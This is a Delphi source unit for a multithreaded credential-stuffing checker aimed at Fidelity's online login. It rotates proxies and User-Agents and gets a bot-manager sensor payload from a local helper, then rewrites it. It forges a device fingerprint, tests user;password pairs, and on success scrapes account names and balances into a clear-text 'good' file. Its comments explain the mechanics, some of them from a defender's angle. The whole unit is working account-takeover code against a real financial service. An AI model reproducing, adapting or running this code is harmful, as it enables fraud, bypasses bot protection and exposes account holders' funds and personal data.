  1. unit BruteAppThread;
  2.  
  3. interface
  4.  
  5. uses
  6. System.Classes, SyncObjs, VCL.Dialogs, synachar, ssl_openssl, Math,
  7. httpsend, synautil, synsock, blcksock, SysUtils, RegExpr;
  8.  
  9. type
  // Worker thread of the checker. Each instance takes credential pairs from
  // the shared AccountList and tests them one at a time (see Execute and
  // WorkingThread).
  TManualThread = class(TThread)
  strict private
    HTTP: THTTPSend;        // HTTP client (Synapse httpsend); created per credential pair in Execute
    Pagedata: TStringList;  // response body loaded as text
    JSON: TStringStream;    // request-body buffer; holds form data as well as JSON
    // Per-attempt strings. Only UserName, Password, DevicePrint, UserCheck and
    // send_AppVersion are referenced in this unit; send_AppVersion is read in
    // WorkingThread but never assigned here.
    PKId, URLText, Bio, UserName, Password, DeviceSign, send_timezone,
    send_height, send_width, send_availHeight, send_AppVersion, Send_productSub,
    DevicePrint, UserCheck: String;

    Reg: TRegExpr;          // regex used to scrape the post-login page


    procedure DelimitUser(Str: string; out User, Pass: string);
  protected
    // ThreadResult as used in this unit: 0 = error page (retry), 1 = good,
    // 2 = bad, 3 = the Good2FA bucket handled by Sync.
    fAcc, fProxy, ThreadResult: Integer;
    fPrAddr, fPrPort: string;  // proxy address and port for the current attempt
    function WorkingThread: Boolean;
    procedure Execute; override;
    procedure MakeSomeRandomError;
    procedure Sync;
  end;
  31.  
  32. implementation
  33.  
  34. uses BruteAppUnit;
  35.  
  // Splits one list entry into a user name and a password.
  //   Str  - raw entry, 'user;pass' or 'user:pass'
  //   User - text before the separator, cut at the first '@' if one is present
  //   Pass - everything after the separator
  // ';' is used as the separator when the entry contains one, otherwise ':'.
  procedure TManualThread.DelimitUser(Str: string; out User, Pass: string);
  begin
    if Pos(';', Str) <> 0 then
    begin
      User := Copy(Str, 1, Pos(';', Str) - 1);
      Pass := Copy(Str, Pos(';', Str) + 1, Length(Str));
    end
    else
    begin
      User := Copy(Str, 1, Pos(':', Str) - 1);
      Pass := Copy(Str, Pos(':', Str) + 1, Length(Str));
    end;

    // An e-mail style user name is reduced to the part before '@'.
    if Pos('@', User) <> 0 then User := Copy(User, 1, Pos('@', User) - 1);
  end;
  51.  
  // Thread body. While the shared Working flag is set, each pass:
  //   1. advances the shared Acc index under the CS lock and clears Working
  //      once the index reaches the end of AccountList;
  //   2. splits that AccountList entry into UserName and Password;
  //   3. marks entries with a user name shorter than 5 characters or an empty
  //      password as ThreadResult 2 without sending any request;
  //   4. otherwise calls WorkingThread until it returns True;
  //   5. passes the outcome to Sync through Synchronize.
  // Working, Acc, AccountList and CS are not declared in this unit
  // (presumably they come from BruteAppUnit).
  //
  // Defender view: WorkingThread selects a new proxy on every call, so
  // repeated attempts for the same pair reach the server from different
  // addresses. Counting attempts per account identifier is unaffected by that.
  procedure TManualThread.Execute;
  var
    fBool: Boolean;
  begin
    while Working do
    begin
      CS.Enter;
      Inc(Acc);
      if AccountList.Count -1 <= Acc then Working := False else fAcc := Acc;
      CS.Leave;

      if Working then
      begin
        // Fresh client objects for every credential pair.
        HTTP := THTTPSend.Create;
        Pagedata := TStringList.Create;
        JSON := TStringStream.Create;

        DelimitUser(AccountList[fAcc], UserName, Password);
        Reg := TRegExpr.Create;
        UserCheck := '';

        if (Length(UserName) >= 5) and (Password <> '') then
        begin
          // Repeat the attempt until WorkingThread reports True.
          repeat
            fBool := WorkingThread;
          until fBool;
        end
        else ThreadResult := 2;

        // Sync updates counters, output files and the result list.
        Synchronize(Sync);

        Reg.Free;
        HTTP.Free;
        Pagedata.Free;
        JSON.Free;
      end;
    end;
  end;
  90.  
  // Increments the shared Help.ConnectError counter under the CS lock.
  // Despite its name it does not generate an error; WorkingThread calls it
  // when a request fails or the site returns its error page.
  procedure TManualThread.MakeSomeRandomError;
  begin
    CS.Enter;
    Inc(Help.ConnectError);
    CS.Leave;
  end;
  97.  
  // Records the outcome of the last attempt; invoked from Execute through
  // Synchronize. Dispatches on ThreadResult:
  //   1 - counted as Good; the pair, the scraped UserCheck text and a
  //       separator line are appended to GoodFile, and the pair is added to
  //       the ResultList view of the main form
  //   2 - counted as Bad; the pair is appended to BadFile
  //   3 - counted as Good2FA; the pair is appended to SecurityFile
  //       (no code in this unit assigns 3 to ThreadResult)
  // Any other value is ignored. Help, Item and the three file variables are
  // not declared in this unit.
  //
  // Forensic note: user names, passwords and the scraped account details are
  // written to these files in clear text as 'user;password' lines.
  procedure TManualThread.Sync;
  begin
    case ThreadResult of
      1: begin
        Inc(Help.Good);

        Append(GoodFile);
        Writeln(GoodFile, UserName + ';' + Password);
        Writeln(GoodFile, UserCheck);
        Writeln(GoodFile, '******************************************');
        CloseFile(GoodFile);

        Item := BruteAppForm.ResultList.Items.Add;
        Item.Caption := UserName;
        Item.SubItems.Add(Password);
      end;
      2: begin
        Inc(Help.Bad);
        Append(BadFile);
        Writeln(BadFile, UserName + ';' + Password);
        CloseFile(BadFile);
      end;
      3: begin
        Inc(Help.Good2FA);
        Append(SecurityFile);
        Writeln(SecurityFile, UserName + ';' + Password);
        CloseFile(SecurityFile);
      end;
    end;
  end;
  128.  
  // Percent-ENCODES a fixed set of characters in Str and returns the result.
  // The name is misleading: nothing is decoded. Each listed character is
  // replaced by its %XX form with StringReplace.
  // This unit-level function is separate from Help.URLDecode, which
  // WorkingThread also calls and which is defined elsewhere.
  function URLDecode(Str: String): String;
  var
    DynStr: String;
  begin
    DynStr := Str;
    DynStr := StringReplace(DynStr, '!', '%21', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '#', '%23', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '$', '%24', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '&', '%26', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, #39, '%27', [rfReplaceAll]);  // #39 is the single quote
    DynStr := StringReplace(DynStr, '*', '%2A', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '+', '%2B', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, ',', '%2C', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '/', '%2F', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, ':', '%3A', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, ';', '%3B', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '=', '%3D', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '?', '%3F', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '@', '%40', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '[', '%5B', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, ']', '%5D', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '{', '%7B', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '"', '%22', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '}', '%7D', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, ' ', '%20', [rfReplaceAll]);
    DynStr := StringReplace(DynStr, '\', '%5C', [rfReplaceAll]);

    Result := DynStr;
  end;
  158.  
  // One login attempt for the current UserName/Password pair.
  //
  // Sequence visible below: select the next proxy, fetch the site home page,
  // obtain a "sensor_data" payload from a service on localhost, post it to the
  // site's /_bm/_data endpoint, then submit the credentials to the login
  // endpoint and classify the response into ThreadResult.
  //
  // Return value: True is assigned once the '_abck' cookie is seen and again
  // when the login response is classified as success or as a user-name error;
  // False is assigned only for the "Technical Issue" page. Execute repeats the
  // call until it gets True.
  //
  // Defender view: every call uses a different proxy and a randomly drawn
  // User-Agent, so per-source-IP thresholds see each login as a new client.
  // Controls that key on the account identifier (failed-login counting,
  // breached-password screening, a required second factor) do not depend on
  // the source address.
  function TManualThread.WorkingThread: Boolean;
  var
    RandomArrInd, I: Integer;
    Sensor, Cook: String;
  begin
    // Start from a clean client state for this attempt.
    JSON.Clear;
    Pagedata.Clear;
    HTTP.Document.Clear;
    HTTP.Cookies.Clear;
    HTTP.Headers.Clear;

    // Advance the shared proxy index under the lock, wrapping to 0 near the
    // end of the list. Proxy, ProxyList, CS and fProxyType are not declared
    // in this unit (presumably BruteAppUnit).
    CS.Enter;
    Inc(Proxy); if ProxyList.Count -1 <= Proxy then Proxy := 0; fProxy := Proxy;
    CS.Leave;

    // Proxy entries are split at the first ':' into address and port.
    fPrAddr := Copy(ProxyList[fProxy], 1, Pos(':', ProxyList[fProxy]) - 1);
    fPrPort := Copy(ProxyList[fProxy], Pos(':', ProxyList[fProxy]) + 1, Length(ProxyList[fProxy]));

    // fProxyType: 0 = HTTP proxy, 1 = SOCKS4, anything else = SOCKS5.
    if fProxyType = 0 then
    begin
      HTTP.ProxyHost := fPrAddr;
      HTTP.ProxyPort := fPrPort;
    end
    else if fProxyType = 1 then
    begin
      HTTP.Sock.SocksIP := fPrAddr;
      HTTP.Sock.SocksPort := fPrPort;
      HTTP.Sock.SocksResolver := False;
      HTTP.Sock.SocksType := ST_Socks4;
    end
    else
    begin
      HTTP.Sock.SocksIP := fPrAddr;
      HTTP.Sock.SocksPort := fPrPort;
      HTTP.Sock.SocksResolver := False;
      HTTP.Sock.SocksType := ST_Socks5;
    end;

    HTTP.AddPortNumberToHost := False;
    HTTP.Protocol := '1.1';
    // RandomArrInd is used further down as an index into the Windows table;
    // the User-Agent is drawn independently from the UserAgents table. Both
    // tables are defined outside this unit.
    RandomArrInd := Random(15);
    HTTP.UserAgent := UserAgents[Random(35)][0];

    // The same three request headers are sent whichever User-Agent was drawn.
    HTTP.Headers.Add('Purpose:prefetch');
    HTTP.Headers.Add('Upgrade-Insecure-Requests:1');
    HTTP.Headers.Add('Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8');

    // Step 1: fetch the home page through the proxy; continue only on HTTP 200.
    if (HTTP.HTTPMethod('GET', 'https://www.fidelity.com/')) and (HTTP.ResultCode = 200) then
    begin
      HTTP.Headers.Clear;
      HTTP.Document.Clear;

      // Disabled by the author: two further GET requests.
      (* HTTP.Headers.Add('Accept:*/*');
      HTTP.Headers.Add('Referer:https://www.fidelity.com/');
      HTTP.HTTPMethod('GET', 'https://www.fidelity.com/_bm/bd-1-30');

      HTTP.Headers.Clear;
      HTTP.Document.Clear;

      HTTP.Headers.Clear;
      HTTP.Document.Clear;

      HTTP.Headers.Add('Accept:*/*');
      HTTP.Headers.Add('Referer:https://www.fidelity.com/');
      HTTP.HTTPMethod('GET', 'https://dpesb.fidelity.com/ftgw/dpdirect/measurement/visitoridentification/v1'); *)



      // Step 2: the proxy settings are blanked so that the next request goes
      // directly to the local machine.
      HTTP.ProxyHost := '';
      HTTP.ProxyPort := '';
      HTTP.Sock.SocksIP := '';
      HTTP.Sock.SocksPort := '';

      HTTP.Headers.Clear;
      HTTP.Document.Clear;

      // Cookies received so far are flattened into cookie0=..&cookie1=.. form
      // fields, values percent-encoded by the unit-level URLDecode. Any
      // exception raised while building the body is swallowed.
      try
        for RandomArrInd := 0 to HTTP.Cookies.Count - 1 do
        begin
          if Cook <> '' then Cook := Cook + '&';

          Cook := Cook + 'cookie' + IntToStr(RandomArrInd) + '=' + URLDecode(HTTP.Cookies[RandomArrInd]);
        end;

        JSON.WriteString(Cook);

      except

      end;

      // The body is posted to a service on localhost port 80 and the reply is
      // searched for a "sensor_data" value. What that service does cannot be
      // seen from this unit - presumably a helper that produces the
      // bot-management sensor payload (to be confirmed against the rest of
      // the project).
      HTTP.Document.LoadFromStream(JSOn);
      HTTP.MimeType := 'application/x-www-form-urlencoded';
      if HTTP.HTTPMethod('POST', 'http://localhost:80/fidelity') then
      begin
        Pagedata.LoadFromStream(HTTP.Document);
        Sensor := Help.Pars('"sensor_data":"', Pagedata.Text, '"}');
        // Fixed substrings of the returned payload are rewritten before it is
        // sent on; the meaning of the individual fields is not shown here.
        Sensor := StringReplace(Sensor, '2883', '12147', [rfReplaceAll]);

        Sensor := StringReplace(Sensor, 'cwen:0', 'cwen:1', [rfReplaceAll]);
        Sensor := StringReplace(Sensor, 'wrc:0', 'wrc:1', [rfReplaceAll]);
        Sensor := StringReplace(Sensor, 'vib:0', 'vib:1', [rfReplaceAll]);
        Sensor := StringReplace(Sensor, 'bat:0', 'bat:1', [rfReplaceAll]);
        Sensor := StringReplace(Sensor, 'do_dis', 'do_en', [rfReplaceAll]);
        Sensor := StringReplace(Sensor, 'dm_dis', 'dm_en', [rfReplaceAll]);

        Sensor := StringReplace(Sensor, 'Gecko,-1', 'Gecko,3', [rfReplaceAll]);
      end;


      // Step 3: restore the proxy chosen at the top for the remaining requests.
      if fProxyType = 0 then
      begin
        HTTP.ProxyHost := fPrAddr;
        HTTP.ProxyPort := fPrPort;
      end
      else if fProxyType = 1 then
      begin
        HTTP.Sock.SocksIP := fPrAddr;
        HTTP.Sock.SocksPort := fPrPort;
        HTTP.Sock.SocksResolver := False;
        HTTP.Sock.SocksType := ST_Socks4;
      end
      else
      begin
        HTTP.Sock.SocksIP := fPrAddr;
        HTTP.Sock.SocksPort := fPrPort;
        HTTP.Sock.SocksResolver := False;
        HTTP.Sock.SocksType := ST_Socks5;
      end;

      HTTP.Headers.Clear;
      HTTP.Document.Clear;
      JSON.Clear;


      // A constant 'ia=1' cookie is added to the cookies already held.
      HTTP.Cookies.Add('ia=1');

      JSON.WriteString('{"sensor_data":"' + Sensor + '"}');
      HTTP.Headers.Clear;
      HTTP.Document.Clear;





      // Operator override from the main form: when sCheckBox1 is checked, the
      // text of sEdit1 is added as a cookie and replaces the request body.
      if BruteAppForm.sCheckBox1.Checked then
      begin
        HTTP.Cookies.Add(BruteAppForm.sEdit1.Text);
        JSON.Clear;
        JSON.WriteString(BruteAppForm.sEdit1.Text);
      end;

      HTTP.Document.LoadFromStream(JSON);


      HTTP.MimeType := 'text/plain;charset=UTF-8';
      HTTP.Headers.Add('Accept:*/*');
      HTTP.Headers.Add('Referer:https://www.fidelity.com/');
      HTTP.Headers.Add('Accept-Language:en-US,en;q=0.9');
      HTTP.KeepAliveTimeout := 0;


      // Step 4: post the payload to /_bm/_data.
      if HTTP.HTTPMethod('POST', 'https://www.fidelity.com/_bm/_data') then
      begin

        // Continue only when the response headers contain '_abck=' ('_abck' is
        // the cookie name used by Akamai Bot Manager).
        if Pos('_abck=', HTTP.Headers.Text) <> 0 then
        begin
          // The verdict is provisionally set here, before any credentials
          // have been sent.
          Result := True;
          ThreadResult := 1;

          HTTP.Headers.Clear;
          HTTP.Document.Clear;

          // Step 5: load the login initialisation URL.
          if HTTP.HTTPMethod('GET', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Init/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
          begin
            HTTP.Headers.Clear;
            HTTp.Document.Clear;


            // DEVICE_PRINT form field in a 'pm_fp*' key=value layout. Apart
            // from the User-Agent, the Chrome major version parsed from it and
            // three values from the Windows table, every field is a constant
            // (version=3.5.2_2, depth 24, pm_fptz=-8, lang=en-US, plugin
            // list). send_AppVersion is not assigned anywhere in this unit.
            // Defender view: the constant parts repeat across every account
            // tried, which makes the fingerprint a server-side correlation key.
            DevicePrint := 'version=3.5.2_2&pm_fpua=' + LowerCase(HTTP.UserAgent) + '|' + send_AppVersion + ' |Win32&pm_fpsc=24'+
            '|' + Windows[RandomArrInd][0] + '|' + Windows[RandomArrInd][1] + '|' + Windows[RandomArrInd][2] + '&pm_fpsw=&pm_fptz=-8&pm_fpln=lang=en-US|syslang=|userlang=&pm_fpjv=0&pm_fpco=1'+
            '&pm_fpasw=internal-pdf-viewer|mhjfbmdgcfjbbpaeojofohoefgiehjai|internal-nacl-plugin&pm_fpan=Netscape&pm_fpacn=Mozilla&pm_fpol=true&pm_fposp=&pm_fpup=&pm_fpsaw=' + Windows[RandomArrInd][0] + '&pm_fpspd=24&pm_fpsbd=&pm_fpsdx='+
            '&pm_fpsdy=&pm_fpslx=&pm_fpsly=&pm_fpsfse=&pm_fpsui=&pm_os=Windows&pm_brmjv=' + Help.Pars('Chrome/', HTTP.UserAgent, '.') + '&pm_br=Chrome&pm_inpt=&pm_expt=';

            // The credentials travel in the SSN (user name) and PIN (password)
            // form fields. Help.URLDecode is defined outside this unit.
            JSOn.Clear;
            JSON.WriteString('DEVICE_PRINT=' + Help.URLDecode(DevicePrint) + '&SSN=' + Username + '&SavedIdInd=N&PIN=' + Password);

            HTTP.Document.LoadFromStream(JSON);

            HTTP.Headers.Add('Accept:application/json, text/javascript, */*; q=0.01');
            HTTP.MimeType := 'application/x-www-form-urlencoded; charset=UTF-8';
            HTTP.Headers.Add('Referer:https://www.fidelity.com/');



            // Step 6: submit the login form and classify the response body.
            if HTTP.HTTPMethod('POST', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Response/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
            begin
              Pagedata.LoadFromStream(HTTP.Document);

              if Pos('"result": "success"', Pagedata.Text) <> 0 then
              begin
                Result := True;
                ThreadResult := 1;

                HTTP.Headers.Clear;
                HTTP.Document.Clear;
                Pagedata.Clear;

                // After a successful login the portfolio page is fetched and
                // each account's name and balance are scraped into UserCheck,
                // which Sync writes to GoodFile. Impact: a hit exposes account
                // details, not only the validity of the credentials.
                if HTTP.HTTPMethod('GET', 'https://oltx.fidelity.com/ftgw/fbc/oftop/portfolio#summary') then
                begin
                  Pagedata.LoadFromStream(HTTP.Document);

                  Reg.Expression := 'js-account"(.*?)data-today-change-pct-value="">';

                  if Reg.Exec(Pagedata.Text) then
                  repeat
                    if UserCheck <> '' then UserCheck := UserCheck + #13#10;
                    UserCheck := UserCheck + Trim(Help.Pars('account-name" data-pii="true">', Reg.Match[1], '<')) + ' ' + Trim(Help.Pars('js-acct-balance">', Reg.Match[1], '<'));
                  until not Reg.ExecNext;
                end;
              end
              // The site's error page: counted as a connection error and
              // reported as False, so Execute repeats the attempt.
              else if Pos('<title>We are Sorry. There was a Technical Issue.</title>', Pagedata.Text) <> 0 then
              begin
                MakeSomeRandomError;
                Result := False;
                ThreadResult := 0;
              end else if Pos('Error:</strong> The username', Pagedata.Text) <> 0 then

              // Login rejected: the pair is classified as bad.
              begin
                Result := True;
                ThreadResult := 2;
              end;
            end
            else MakeSomeRandomError;  // login POST failed


          end
          else MakeSomeRandomError;  // login-init GET failed

        end else begin
          // No '_abck' cookie in the response: counted as an internal error.
          CS.Enter;
          Inc(help.InternalErrors);
          CS.Leave;
        end;

      end
      else MakeSomeRandomError;  // POST to /_bm/_data failed
    end
    else MakeSomeRandomError;  // home-page GET failed or did not return 200
  end;
  408.  
  409. end.